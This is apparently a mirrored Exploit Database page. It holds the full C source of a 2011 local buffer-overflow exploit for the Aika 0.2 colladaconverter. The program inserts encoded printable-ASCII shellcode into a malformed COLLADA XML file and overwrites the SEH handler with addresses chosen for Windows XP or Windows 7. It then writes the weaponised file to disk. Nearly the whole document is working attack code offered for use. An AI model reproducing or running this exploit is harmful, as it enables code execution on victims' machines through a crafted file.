Aika 0.2 – colladaconverter Xml Parsing Buffer Overflow

• Exploit Database
• 15 阅读

• 作者： isciurus
  日期： 2011-09-12
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17820/

• /*
  //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  	# Exploit Title: Aika colladaconverter buffer overflow exploit
  	# Date: 09/11/2011
  	# Author: isciurus
  	# Software Link: http://aika.googlecode.com/files/aika-v02.zip
  	# Version: 0.2
  	# Tested on: Windows 7 x64
   
  This program is free software: you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation, either version 3 of the License, or
  (at your option) any later version.
   
  This program is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
  GNU General Public License for more details.
   
  You should have received a copy of the GNU General Public License
  along with this program.If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.
   
  //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  */
  
  #include <stdio.h>
  #include <windows.h>
  #include <stdlib.h>
  #include "string.h"
  
  char printableASCIIShellcode[] = 	// encoded 499 bytes
  	"WUQQUj3hKzJYSaRYjVCX4VGRH4z0BfXRQPPZjQX4QP2BM0BMX2Ai0BMXYZPOCKHG" // will be injected inside the file path ---------
  	"OHOCHGCKHKkAgFCBMGKJEA3Ag2Bg0BgABE94ku2QmAiAszHthbzMIMQ8Uz9TFQWC" //|
  	"GDNW6jYeJ8l47kSCPlKPRZljwLskRH6RQ0OiKjRENz4TUYHTfu6rjMTi1NAjGwMF" //|
  	"RHxIjxgzoZnVXlGIXJbCJYhxKHXKvjyFXDDLbNydxzXT3vTJdfa7Hpp3VM1jUOVv" //|
  	"UJYuPT3vkOQIPYGxa6Rk6NOaV9PEH56Mrrz5ZSPLOAvKIsFOCbfqWBRXPCNWSmJf" //|
  	"EVCXNoYNR9oDOaWoykz1Ev3TxcSHQz4ZOOLxlGBjsDGWGJs1EOCNqaAAOWHAMWCx" //|
  	"JEFIrTQ70vEFELaCIPPAPP0GUSmGfq1ZioUNQQATGCISZuJHNKRnlC3baNSAvIRO" //|
  	"HLvt4zVFHLkLxBQR5XsKpEN90RgdBZlNmISLELGsEL0myBVKzJY"; //|
   //|
  char xml[] = //|
  	"<?xml version=\"1.0\" encoding=\"utf8\"?>"//|
  	"<COLLADA xmlns=\"http://www.collada.org/2005/11/COLLADASchema\" version=\"1.4.1\">" //|
  "<asset>"//|
  "<contributor>"//|
  "<author>isciurus</author>"//|
  "<comments>The shellcode encoded with http://www.exploit-db.com/exploits/13286/</comments>" // |
  "</contributor>" //|
  "<created>2011-09-04T22:29:59Z</created>"//|
  "<modified>2011-09-04T22:29:59Z</modified>"//|
  "<unit meter=\"0.01\" name=\"centimeter\"/>" //|
  "<up_axis>Y_UP</up_axis>"//|
  "</asset>" //|
  "<library_cameras>"//|
  "<camera id=\"cameraShape1\" name=\"cameraShape1\">" //|
  "<optics>" //|
  "<technique_common>" //|
  "<perspective>"//|
  "<yfov>37.8492</yfov>" //|
  "<aspect_ratio>1.5</aspect_ratio>" //|
  "<znear>1</znear>" //|
  "<zfar>10000</zfar>" //|
  "</perspective>" //|
  "</technique_common>"//|
  "</optics>"//|
  "</camera>"//|
  "</library_cameras>" //|
  "<library_lights></library_lights>"//|
  "<library_images>" //|
  "<image id=\"file2\" name=\"file2\" depth=\"1\">"//|
  "<init_from>E:\\aika\\"//<---------------------------
  	"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
  "SSSSSSSSSSSSSSADDR_1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  	// ^
  	// | 
  	//------------------------------------------------- the shellcode will be copied at this address
  "AAAAA"
  	"		</init_from>"
  "</image>"
  	"	<image id=\"file3\" name=\"file3\" depth=\"1\">"
  "<init_from>E:\\aika\\"
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" 
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
  	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
  	"BBBBBBBBADDR_2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  	// ^
  	// | 
  	//-------------------------------------------------------- these bytes will overwrite SEH handler
  	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" // this part forces the application to write outside							
  	"AAAAAAAAAAAAAAAAAAAA"	// the stack and triggers AV exception		
  	"		</init_from>"
  "</image>"
  "</library_images>"
  "<library_materials>"
  "<material id=\"blinn3\" name=\"blinn3\">"
  "<instance_effect url=\"#blinn3-fx\"/>"
  "</material>"
  "</library_materials>"
  "<library_geometries>"
  "<geometry id=\"LOD3spShape-lib\" name=\"LOD3spShape\">"
  "<mesh>"
  "<source id=\"LOD3spShape-lib-positions\" name=\"position\">"
  "<technique_common>"
  "<accessor count=\"2108\" offset=\"0\" source=\"#LOD3spShape-lib-positions-array\" stride=\"3\">"
  "<param name=\"X\" type=\"float\"/>"
  "<param name=\"Y\" type=\"float\"/>"
  "<param name=\"Z\" type=\"float\"/>"
  "</accessor>"
  "</technique_common>"
  "</source>"
  "<source id=\"LOD3spShape-lib-normals\" name=\"normal\">"
  "<technique_common>"
  "<accessor count=\"2290\" offset=\"0\" source=\"#LOD3spShape-lib-normals-array\" stride=\"3\">"
  "<param name=\"X\" type=\"float\"/>"
  "<param name=\"Y\" type=\"float\"/>"
  "<param name=\"Z\" type=\"float\"/>"
  "</accessor>"
  "</technique_common>"
  "</source>"
  "<source id=\"LOD3spShape-lib-map1\" name=\"map1\">"
  "<technique_common>"
  "<accessor count=\"2277\" offset=\"0\" source=\"#LOD3spShape-lib-map1-array\" stride=\"2\">"
  "<param name=\"S\" type=\"float\"/>"
  "<param name=\"T\" type=\"float\"/>"
  "</accessor>"
  "</technique_common>"
  "</source>"
  "<vertices id=\"LOD3spShape-lib-vertices\">"
  "<input semantic=\"POSITION\" source=\"#LOD3spShape-lib-positions\"/>"
  "</vertices>"
  "<triangles count=\"4212\" material=\"blinn3SG\">"
  "<input offset=\"0\" semantic=\"VERTEX\" source=\"#LOD3spShape-lib-vertices\"/>"
  "<input offset=\"1\" semantic=\"NORMAL\" source=\"#LOD3spShape-lib-normals\"/>"
  "<input offset=\"2\" semantic=\"TEXCOORD\" source=\"#LOD3spShape-lib-map1\" set=\"0\"/>"
  "<p>375</p>"
  "</triangles>"
  "</mesh>"
  "</geometry>"
  "</library_geometries>"
  "<scene>"
  "<instance_visual_scene url=\"#VisualSceneNode\"/>"
  "</scene>"
  	"</COLLADA>";
  
  int main(int argc, char **argv)
  {
  	FILE *xml_file;
  	char win7;
  	char *offset;
  	char *ll;
  
  	if(argc < 2)
  	{
  		printf("\nUsage: aika_bof <malformed_collada_xml_path>");
  		return 0;
  	}
  
  	if(sizeof(printableASCIIShellcode) > 644)
  	{
  		printf("\nSorry, the shellcode is too long, 644 chars is maximum");
  		return 0;
  	}
  	
  	while(1)
  	{
  		char os;
  
  		printf("\nChoose OS version ([X] for Windows XP, [7] for Windows 7):");
  		os = tolower(getchar());
  		
  		if(os == 'x')
  		{
  			win7 = 0;
  			break;
  		}
  		else if(os == '7')
  		{
  			win7 = 1;
  			break;
  		}
  		else
  		{
  			printf("\nUnknown OS version");
  		}
  	}
  
  	printf("\n[*] Injecting the shellcode into the xml...");
  
  	offset = strstr(xml, "SSSSSSSSSSSSSSSSSSSSSSSSSSSS");
  	strncpy(offset, printableASCIIShellcode, sizeof(printableASCIIShellcode) - 1);
  	
  	if(win7 == 1)
  	{
  		offset = strstr(xml, "ADDR_1");
  		strncpy(offset, "%40%02", sizeof("%40%02") -1);
  		offset = strstr(xml, "ADDR_2");
  		strncpy(offset, "%40%02", sizeof("%40%02") -1);
  	}
  	else
  	{
  		offset = strstr(xml, "ADDR_1");
  		strncpy(offset, "%40%01", sizeof("%40%01") -1);
  		offset = strstr(xml, "ADDR_2");
  		strncpy(offset, "%40%01", sizeof("%40%01") -1);
  	}
  
  	printf("done");
  
  	printf("\n[*] Writing %d bytes to %s...", sizeof(xml), argv[1]);
  	
  	xml_file = fopen(argv[1], "wb");
  	if(xml_file == NULL)
  	{
  		printf("\nerror while opening %s", argv[1]);
  		return 0;
  	}
  	
  	if(fwrite(xml, 1, sizeof(xml) - 1, xml_file) != sizeof(xml) - 1)
  	{
  		printf("\nerror while writing into %s", argv[1]);
  		return 0;
  	}
  
  	printf("done");	
  }